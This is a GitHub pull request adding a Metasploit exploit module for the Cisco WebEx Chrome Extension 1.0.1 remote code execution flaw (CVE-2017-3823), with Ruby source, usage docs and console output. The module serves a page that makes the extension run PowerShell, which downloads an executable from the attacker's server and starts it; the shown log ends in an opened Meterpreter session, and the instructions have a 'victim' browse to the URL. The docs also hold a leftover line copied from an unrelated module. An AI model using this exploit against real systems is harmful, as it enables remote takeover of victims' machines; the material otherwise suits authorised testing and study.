### PR TITLE
Cisco WebEx Extension 1.0.1 Remote Code Execution

### DIFF
--- a/documentation/modules/exploit/windows/misc/cisco_webex_ext.md
+++ b/documentation/modules/exploit/windows/misc/cisco_webex_ext.md
@@ -14,9 +14,6 @@ Cisco WebEx Chrome Extension 1.0.1 is known to be affected.
 
 **Using cisco_webex_ext**
 
-After the encrypted communication is enabled, you are ready to use
-hp_dataprotector_encrypted_comms. Here is what you do:
-
 1. Start msfconsole
 2. Do: ```use exploit/windows/misc/cisco_webex_ext```
 3. Do: ```set SRVHOST [IP ADDRESS]```

--- a/documentation/modules/exploit/windows/misc/cisco_webex_ext.md
+++ b/documentation/modules/exploit/windows/misc/cisco_webex_ext.md
@@ -1,0 +1,55 @@
+Cisco WebEx is a suite of applications for online meeting organization and video conferencing.
+Included in this suite are extensions for popular web browsers which ease use and provide supplemental
+features.
+
+Version 1.0.1 of the WebEx extension for Google Chrome contains a vulnerability which allows an
+attacker to execute arbitrary commands on a target, which can lead to arbitrary remote code execution.
+
+
+## Vulnerable Application
+
+Cisco WebEx Chrome Extension 1.0.1 is known to be affected.
+
+## Verification Steps
+
+**Using cisco_webex_ext**
+
+After the encrypted communication is enabled, you are ready to use
+hp_dataprotector_encrypted_comms. Here is what you do:
+
+1. Start msfconsole
+2. Do: ```use exploit/windows/misc/cisco_webex_ext```
+3. Do: ```set SRVHOST [IP ADDRESS]```
+4. Do: ```set SRVPORT [PAYLOAD NAME]```
+5. Do: ```set URIPATH [ARBITRARY URI]```
+6. Do: ```Choose a payload and set any specific options```
+6. Do: ```run```, after a target browses to the generated URL, you should receive a session like the following:
+
+```
+msf > use exploits/windows/misc/cisco_webex_ext
+msf exploit(cisco_webex_ext) > set srvhost 10.6.0.151
+srvhost => 10.6.0.151
+msf exploit(cisco_webex_ext) > set srvport 4567
+srvport => 4567
+msf exploit(cisco_webex_ext) > set uripath not_a_very_good_meeting
+uripath => not_a_very_good_meeting
+msf exploit(cisco_webex_ext) > run
+[*] Exploit running as background job.
+
+[*] Started reverse TCP handler on 10.6.255.229:4444
+[*] Using URL: https://10.6.0.151:4567/not_a_very_good_meeting
+[*] Server started.
+msf exploit(cisco_webex_ext) > [*] 10.6.0.151       cisco_webex_ext - Got request: /not_a_very_good_meeting
+[*] 10.6.0.151       cisco_webex_ext - From: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
+[*] 10.6.0.151       cisco_webex_ext - Got request: /not_a_very_good_meeting/cwcsf-nativemsg-iframe-43c85c0d-d633-af5e-c056-32dc7efc570b.html
+[*] 10.6.0.151       cisco_webex_ext - From: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
+[*] 10.6.0.151       cisco_webex_ext - Sending exploit html ...
+[*] 10.6.0.151       cisco_webex_ext - Got request: /not_a_very_good_meeting/qt3iFe8N
+[*] 10.6.0.151       cisco_webex_ext - From:
+[*] 10.6.0.151       cisco_webex_ext - Sending payload ...
+[*] Sending stage (957487 bytes) to 10.6.255.229
+[*] Meterpreter session 1 opened (10.6.255.229:4444 -> 10.6.255.229:57472) at 2017-01-26 13:27:28 -0600
+
+msf exploit(cisco_webex_ext) >
+```
+

--- a/modules/exploits/windows/misc/cisco_webex_ext.rb
+++ b/modules/exploits/windows/misc/cisco_webex_ext.rb
@@ -27,7 +27,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Platform'       => 'win',
         'Targets'        =>
         [
-          [ 'Mozilla Firefox',
+          [ 'Cisco WebEx Extension 1.0.1',
             {
               'Platform' => 'win',
               'Arch'     => ARCH_X86,

--- a/modules/exploits/windows/misc/cisco_webex_ext.rb
+++ b/modules/exploits/windows/misc/cisco_webex_ext.rb
@@ -25,6 +25,10 @@ class MetasploitModule < Msf::Exploit::Remote
           'William Webb <william_webb[at]rapid7.com>'         # Metasploit module
         ],
         'Platform'       => 'win',
+        'DefaultOptions' =>
+        {
+          'SSL' => true,
+        },
         'Targets'        =>
         [
           [ 'Cisco WebEx Extension 1.0.1',

--- a/modules/exploits/windows/misc/cisco_webex_ext.rb
+++ b/modules/exploits/windows/misc/cisco_webex_ext.rb
@@ -75,16 +75,6 @@ var msg = {
 
 function runcode()
 {
-    if (!document.location.pathname.endsWith("cwcsf-nativemsg-iframe-43c85c0d-d633-af5e-c056-32dc7efc570b.html")) {
-        alert("document /must/ be named cwcsf-nativemsg-iframe-43c85c0d-d633-af5e-c056-32dc7efc570b.html");
-        return;
-    }
-
-    if (!document.location.protocol.endsWith("https:")) {
-        alert("document /must/ be served over https");
-        return;
-    }
-
     document.dispatchEvent(new CustomEvent("connect", { detail: { token: "token" }}));
     document.dispatchEvent(new CustomEvent("message", { detail: {
             message: JSON.stringify(msg),

--- a/modules/exploits/windows/misc/cisco_webex_ext.rb
+++ b/modules/exploits/windows/misc/cisco_webex_ext.rb
@@ -59,7 +59,6 @@ def exploit_html(cli, req_uri)
   html = %Q~
 <html>
 <head>
-<title>Cisco WebEx Exploit</title>
 <script>
 var msg = {
     GpcProductRoot: "WebEx",

--- a/modules/exploits/windows/misc/cisco_webex_ext.rb
+++ b/modules/exploits/windows/misc/cisco_webex_ext.rb
@@ -36,7 +36,7 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'References'     =>
         [
-          [ 'CVE', 'CVE-2017-3823' ],
+          [ 'CVE', '2017-3823' ],
         ],
         'Arch'           => ARCH_X86,
         'DisclosureDate' => "Jan 21 2017",

--- a/modules/exploits/windows/misc/cisco_webex_ext.rb
+++ b/modules/exploits/windows/misc/cisco_webex_ext.rb
@@ -1,0 +1,136 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = GreatRanking
+
+  include Msf::Exploit::Remote::HttpServer
+  include Msf::Exploit::EXE
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Cisco WebEx Chrome Extension RCE (CVE-2017-3823)",
+      'Description'    => %q{
+        This module exploits a vulnerability present in the Cisco WebEx Chrome Extension
+        version 1.0.1 which allows an attacker to execute arbitrary commands on a system.
+        },
+        'License'        => MSF_LICENSE,
+        'Author'         =>
+        [
+          'Tavis Ormandy <taviso@google.com>',                # Original research/PoC
+          'William Webb <william_webb[at]rapid7.com>'         # Metasploit module
+        ],
+        'Platform'       => 'win',
+        'Targets'        =>
+        [
+          [ 'Mozilla Firefox',
+            {
+              'Platform' => 'win',
+              'Arch'     => ARCH_X86,
+            }
+          ],
+        ],
+        'References'     =>
+        [
+          [ 'CVE', 'CVE-2017-3823' ],
+        ],
+        'Arch'           => ARCH_X86,
+        'DisclosureDate' => "Jan 21 2017",
+        'DefaultTarget'  => 0
+        ))
+end
+
+def setup
+  @payload_uri = "#{Rex::Text.rand_text_alphanumeric(8)}"
+  @payload_exe = "#{Rex::Text.rand_text_alpha(8)}.exe"
+  super
+end
+
+def exploit_html(cli, req_uri)
+  base_uri = "#{get_resource.chomp('/')}"
+  html = %Q~
+<html>
+<head>
+<title>Cisco WebEx Exploit</title>
+<script>
+var msg = {
+    GpcProductRoot: "WebEx",
+    GpcMovingInSubdir: "Wanta",
+    GpcProductVersion: "T30_MC",
+    GpcUnpackName: "atgpcdec",
+    GpcExtName: "atgpcext",
+    GpcUnpackVersion: "27, 17, 2016, 501",
+    GpcExtVersion: "3015, 0, 2016, 1117",
+    GpcUrlRoot: "http://127.0.0.1/",
+    GpcComponentName: btoa("MSVCR100.DLL"),
+    GpcSuppressInstallation: btoa("True"),
+    GpcFullPage: "True",
+    GpcInitCall: btoa("_wsystem(Ex1);"),
+    Ex1: btoa("PowerShell [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ; $wc = New-Object System.Net.WebClient ; $pl = $env:temp+'\\#{@payload_exe}' ; $wc.DownloadFile('https://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{base_uri}/#{@payload_uri}', $pl) ; Start-Process $pl"),
+}
+
+function runcode()
+{
+    if (!document.location.pathname.endsWith("cwcsf-nativemsg-iframe-43c85c0d-d633-af5e-c056-32dc7efc570b.html")) {
+        alert("document /must/ be named cwcsf-nativemsg-iframe-43c85c0d-d633-af5e-c056-32dc7efc570b.html");
+        return;
+    }
+
+    if (!document.location.protocol.endsWith("https:")) {
+        alert("document /must/ be served over https");
+        return;
+    }
+
+    document.dispatchEvent(new CustomEvent("connect", { detail: { token: "token" }}));
+    document.dispatchEvent(new CustomEvent("message", { detail: {
+            message: JSON.stringify(msg),
+            message_type: "launch_meeting",
+            timestamp: (new Date()).toUTCString(),
+            token: "token"
+        }
+    }));
+}
+</script>
+</head>
+<body onload="runcode()">
+
+</body>
+</html>
+  ~
+
+  send_response(cli, html, { 'Content-Type' => 'text/html', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache', 'Connection' => 'close' })
+end
+
+def on_request_uri(cli, request)
+  print_status("Got request: #{request.uri}")
+  print_status("From: #{request.headers['User-Agent']}")
+
+  if request.uri =~ /cwcsf-nativemsg-iframe-43c85c0d-d633-af5e-c056-32dc7efc570b\.html/
+    print_status("Sending exploit html ...")
+    exploit_html(cli, request.uri)
+    close_client(cli)
+    return
+  elsif request.uri =~ /.*#{@payload_uri}$/
+    return if ((payload = regenerate_payload(cli)) == nil)
+    print_status("Sending payload ...")
+    send_response(cli, generate_payload_exe({ :code => payload.encoded }), { 'Content-Type' => 'application/octet-stream', 'Connection' => 'close' })
+  else
+    base_uri = "#{get_resource.chomp('/')}"
+    html = %Q~
+    <html>
+    <head>
+    <meta http-equiv="refresh" content="0; URL='#{get_resource}/cwcsf-nativemsg-iframe-43c85c0d-d633-af5e-c056-32dc7efc570b.html' />"
+    </head>
+    <body>
+    </body>
+    </html>
+    ~
+    send_response(cli, html, { 'Content-Type' => 'text/html', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache', 'Connection' => 'close' })
+    close_client(cli)
+  end
+  end
+end


### PR DESCRIPTION
This module exploits the ~~vulnerability~~ brilliant feature present in the Cisco WebEx Chrome Extension v 1.0.1 detailed [here](https://bugs.chromium.org/p/project-zero/issues/detail?id=1096).  The module uses HttpServer to serve the landing page and payload, and will invoke PowerShell to download and execute the payload.  If someone wanted to sit down and figure out the WebEx scripting that's going on, you could probably improve on this and include an inline payload; however, this should do the trick.

## Verification

- [x] ~~Get a copy of the vulnerable extension [here](https://help.webex.com/docs/DOC-8177)~~ - It looks like they finally removed it, contact me for a copy of the old one
- [x] Make sure it's installed by visiting [this page](https://www.webex.co.in/test-meeting.html) - you should be able to fill out the form with garbage. **EDIT**: per @wchen-r7 's comment below, DON'T click "Add WebEx to Chrome" on the website.  You want to install the binary, but not the extension.  It will just install the newest patched version.
- [x] Start `msfconsole`
- [x] `use exploit/windows/misc/cisco_webex_ext`
- [x] `set SRVHOST <your ip>`
- [x] `set SRVPORT 123whatever`
- [x] `set SSL true` **ssl MUST be enabled for the exploit to work**
- [x] set options for the payload of your choosing
- [x] `run`
- [x] have the victim with the vulnerable browser extension browse to the supplied url
- [x] You should get something like this
![webex1](https://cloud.githubusercontent.com/assets/16786368/22315066/20362548-e32a-11e6-880c-71e652f32504.png)

I'll add a module doc either tonight or tomorrow.

Edit: I'll also remove Mozilla Firefox from the targets list :P 